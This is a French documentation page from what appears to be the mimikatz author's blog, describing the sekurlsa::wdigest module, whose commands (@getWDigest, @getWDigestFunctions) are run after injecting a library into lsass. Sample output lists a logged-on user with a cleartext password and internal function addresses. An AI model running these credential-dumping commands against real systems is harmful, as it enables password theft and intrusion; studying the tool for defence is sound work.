sekurlsa :: wdigest

wdigest

Librairie de manipulation du provider WDigest
Le deuxième « pass the pass » de sekurlsa

Contrairement à son homologue TsPkg, WDigest est disponible sur toutes les versions de NT (http://blog.gentilkiwi.com/securite/re-pass-the-pass)

Avant d’utiliser les méthodes offertes, il convient d’avoir injecté la librairie sekurlsa dans le processus lsass : http://blog.gentilkiwi.com/mimikatz/sekurlsa

Méthodes offertes :

@ getWDigest

Description : Énumère les sessions courantes du provider WDigest
Arguments : n.a.
Article : http://blog.gentilkiwi.com/securite/re-pass-the-pass
Exemple : @getWDigest

mimikatz # @getWDigest

Authentification Id         : 0;543606
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w7-ult-x
        wdigest :       waza1234/

@ getWDigestFunctions

Description : Affiche les fonctions du provider WDigest_0 nécessaires à la recherche des mots de passe
Arguments : n.a.
Exemple : @getWDigestFunctions

mimikatz # @getWDigestFunctions
** wdigest.dll/lsasrv.dll ** ; Statut recherche : OK :)

@pWDigestLogSessList = 000007FEFD0712C0
@LsaUnprotectMemory  = 000007FEFD668950

One thought on “sekurlsa :: wdigest

  1. Pingback: Re – pass the pass (word) | Blog de Gentil Kiwi

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

*

Vous pouvez utiliser ces balises et attributs HTML : <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>